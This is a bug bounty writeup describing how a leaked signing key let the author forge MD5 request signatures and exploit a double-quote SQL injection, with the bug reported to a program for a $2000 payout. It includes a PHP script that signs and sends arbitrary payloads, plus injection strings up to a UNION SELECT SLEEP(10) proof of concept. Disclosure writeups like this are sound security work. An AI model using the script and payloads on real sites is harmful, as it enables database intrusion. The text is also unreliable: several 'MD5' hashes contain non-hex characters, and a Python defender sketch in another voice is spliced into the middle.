Published in SUDOROOT

[Bug Bounty Writeups] Exploiting SQL Injection Vulnerability

I’m going to share this concise writeup for a bug I reported to one of the bug bounty programs on HackerOne.

The bug was very straightforward, but there was an obstacle that could prevent it from being discovered:
every request you submit has to carry a valid signature. 😲

Let’s say the endpoint looks like this:

http://site.com/vuln.php?param=1&sig=MD5_HASH

The backend server first validates the request to check that a valid signature is provided, then continues and processes the request.
So,
if we need to test that endpoint, we first need to know how signatures are calculated.
For this purpose I took a look at the developers’ documentation, and I was very lucky to find the SecretKey used to generate the MD5 signature leaked in that documentation. 🥳

How signatures are calculated:

signature = md5 ( params_value + SecretKey )

The signature is the MD5 sum of all parameter values concatenated with the SecretKey.

Let’s say the SecretKey was “AABBCCDDEEFFGG”.

That means, if we need a request like this:

vuln.php?param=1111"

then the signature must be:

md5 ( 1111" + AABBCCDDEEFFGG)
= md5(1111"AABBCCDDEEFFGG)
= d2d0114df70a4485a8d836efa018b28d

The final request looks like:

https://site.com/vuln.php?param=1111"&sig=d2d0114df70a4485a8d836efa018b28d

The request above triggered an SQL error 😎

🥺🥺🥺🥺🥺🥺🥺

I was asked by the team to dig deeper into exploiting this vulnerability and to provide a PoC that results in a 10-second delay in the server response 🤐

For that purpose I had to try several queries, so I wrote this very simple PHP script to save the time that would otherwise be spent generating signatures:

<?php
// Raw parameter value from the command line. The signature is computed over the
// raw value (what the backend sees after URL decoding), not the URL-encoded one.
$param = $argv[1];
$SecretKey = "AABBCCDDEEFFGG";
$sig = md5($param . $SecretKey);
// URL-encode only when building the request URL.
$req = "http://site.com/vuln.php?param=" . urlencode($param) . "&sig=" . $sig;
echo $req . "\n";
echo file_get_contents($req);
?>

By running the code from the terminal:

$ php exp.php 1"

http://site.com/vuln.php?param=1"&sig=5a8xd71839d8073218e5761025791d2c

gives → MySQL Error 🧐

$ php exp.php 1" ORDER BY 1 -- +-

http://site.com/vuln.php?param=1+ORDER+BY+1--%2B-&sig=f8b8cb839d8j33218odi610sq2791d2c
... etc.

$ php exp.php 1" UNION SELECT 1,SLEEP(10),3 -- +-

http://site.com/vuln.php?param=1+UNION+SELECT+1%2CSLEEP%2810%29%2C3--%2B-&sig=32a097a82139a371bcb6839e0aa103e8
Got a 10-second delay 😁.

😪😪😪😪

It was a double-quote injection. Automated tools will not work in this case since they have no idea about that signature (you can code your own tamper script for sqlmap to automate it).
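As an added example (not the author’s script), here is a defender-side sketch in Python of the scheme the writeup describes: the md5(value + SecretKey) gate is checked first, and the only difference between the vulnerable handler and the fixed one is whether the parameter is concatenated into the query or bound. The key and the SQLite table are constructed stand-ins; the literal is single-quoted because that is SQLite’s portable string syntax, while the writeup’s bug was in a double-quoted context.

```python
import hashlib
import hmac
import sqlite3

# Constructed stand-ins: the key and the table are not the program's real data.
SECRET_KEY = "AABBCCDDEEFFGG"


def sign(param_value: str) -> str:
    """The scheme from the writeup: md5(raw parameter value + SecretKey)."""
    return hashlib.md5((param_value + SECRET_KEY).encode()).hexdigest()


def signature_ok(param_value: str, sig: str) -> bool:
    """Constant-time check; once the key leaks, this gate admits any value."""
    return hmac.compare_digest(sign(param_value), sig)


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id TEXT, name TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?)", [("1", "alpha"), ("2", "beta")])
    return db


def vuln_handler(db: sqlite3.Connection, param: str, sig: str):
    """Mirrors the bug: the signature passes, then the value is glued into SQL."""
    if not signature_ok(param, sig):
        return "bad signature"
    query = "SELECT name FROM items WHERE id = '" + param + "'"
    return [row[0] for row in db.execute(query)]


def safe_handler(db: sqlite3.Connection, param: str, sig: str):
    """Same gate, but the value is bound as a parameter: quotes stay data."""
    if not signature_ok(param, sig):
        return "bad signature"
    rows = db.execute("SELECT name FROM items WHERE id = ?", (param,))
    return [row[0] for row in rows]


def run(handler, param: str, sig: str):
    """Drive a handler against a fresh database and report the outcome."""
    try:
        return handler(make_db(), param, sig)
    except sqlite3.OperationalError as exc:
        return "SQL error: " + str(exc)
```

Calling run(vuln_handler, "1'", sign("1'")) reproduces the writeup’s first symptom, a database error behind a valid signature, while run(safe_handler, "1'", sign("1'")) returns no rows because the quote is treated as data.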

The bug was submitted to the program; it has a CVSS of 10/10 and was classified as Critical. The program paid $2000 for this bug, which was the maximum payout the program could pay at that time.

Cheers 🥂

./S3cr3tSDN

Ahmed ElTijani (S3cr3tSDN): OSWE, OSCP, CTF Player, Bug Bounty Hunter, SQL injector
